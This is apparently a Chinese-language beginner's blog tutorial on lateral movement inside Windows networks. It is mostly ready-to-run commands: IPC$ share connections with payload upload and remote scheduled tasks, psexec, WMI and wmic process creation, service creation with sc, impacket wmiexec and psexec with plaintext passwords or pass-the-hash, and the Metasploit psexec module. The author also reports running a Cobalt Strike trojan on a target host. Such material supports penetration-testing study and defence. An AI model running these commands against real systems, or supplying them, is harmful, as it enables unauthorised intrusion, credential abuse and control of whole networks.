初学内网横向命令执行

简介

横向移动，根据定义是指获取内网某台机器的控制权之后，以被攻陷主机为跳板，通过搜集域内凭证，找办法访问到域内其他机器，再依次循环往复，直到获得域控权限甚至控制内网。

IPC 计划任务横向

IPC共享命名管道的资源，是为了实现进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限，使用139、445端口。建立向目标主机的IPC$连接，把命令执行的脚本传到目标主机，创建计划任务在目标机器上执行命令脚本。

1、目标主机开启了139和445端口；

2、目标主机开启了ipc$默认共享；

3、需要目标主机的可登录账户及密码。

建立ipc连接

net use \\目标主机ip\ipc$ "主机password" /user:"主机用户名"

查看已经建立的连接

net use

上传文件到目标主机

copy 本地文件路径 \\目标主机ip\c$

schtasks创建计划任务

windows-server2012之前的版本可以使用at命令创建计划任务，之后的版本at命令已经被淘汰，使用schtasks命令创建计划任务。

创建任务之前可以先查询一下目标主机的机器时间

net time \\目标主机ip

schtasks命令创建计划任务

schtasks /create /s 192.168.95.142 /u long\administrator /p Ling123 /sc minute /st 16:45 /tn test /tr c:\av.exe /ru system

/Create #创建计划任务

/S #远程主机

/U #用户名

/P #密码

/SC #任务运行频率

/ST #运行时间

/TN #任务名称

/TR #命令路径

/RU #运行权限

/MO #运行周期

查询计划任务

schtasks /query /s 192.168.95.142 /u long\administrator /p Ling123 | findstr "test"

删除计划任务

schtasks.exe /delete /s 192.168.95.142 /u long\administrator /p Ling123 /tn "test"

计划任务执行文件

我这里使用的是cs生成的木马文件上传设置执行，成功上线。

psexec.exe远程命令执行

下载地址：

https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

psexec.exe \\目标主机ip -u 用户名 -p 密码 powershell.exe

wmicmd.exe回显命令执行

下载地址：

https://github.com/nccgroup/WMIcmd/releases

 WMIcmd.exe -h 192.168.95.154 -u administrator -p Ling123 -c "whoami" -d hostname

sc命令创建服务执行

sc \\目标主机ip create test binpath="cmd.exe /c c:\av.exe"      #创建test服务

sc \\目标主机ip start test                                                           #启动test服务

sc \\目标主机ip del test                                                             #删除test服务

WMI命令横向

WMI全称是“windows管理规范”，从win2003开始一直存在。它原本的作用是方便管理员对windows主机进行管理，但是在内网渗透中，可以使用WMI进行横向移动。

需要目标主机wmi服务及端口135开启（默认开启），需要防火墙允许135、445等端口通信并且需要知道目标主机的账户密码。

无需上传第三方软件，利用系统内置程序单命令执行，但是执行命令后无结果回显。

WMIC命令的process选项可以在目标主机的系统中创建进程，可以帮助创建后门。

wmic process call create “[Process Name]”

wmic /node:192.168.95.154 /user:administrator /password:Ling123 process call create "cmd.exe /c ipconfig>c:\test.txt"

impacket工具wmiexec

下载地址：

https://github.com/SecureAuthCorp/impacket

利用用户名及密码执行命令

cd impacket/examples

python3 wmiexec.py 用户名:'密码'@目标主机ip "whoami"

利用用户hash执行命令

首先需要想办法获取目标主机的登录hash

python .\wmiexec.py -hashes :密码hash 用户名@目标主机 "whoami"

SMB横向

利用SMB服务通过明文或hash传递来远程执行命令

需要目标主机开发445端口及账号密码或hash

使用impacket工具psexec.py

下载地址：

https://github.com/CoreSecurity/impacket

git clone https://github.com/CoreSecurity/impacket.git

cd impacket

python3 setup.py install

cd examples

python3 psexec.py

用户密码登录

python3 psexec.py 用户名:'密码'@目标主机ip "whoami"

hsah登录

 python3 psexec.py -hashes :密码hash 用户名@目标主机ip "whoami"

使用msf的Psexec模块

use exploit/windows/smb/psexec

set RHOST 目标主机ip

set smbuser usernmae

set smbpass password

run

---

结语

已无暇顾及过去，要向前走。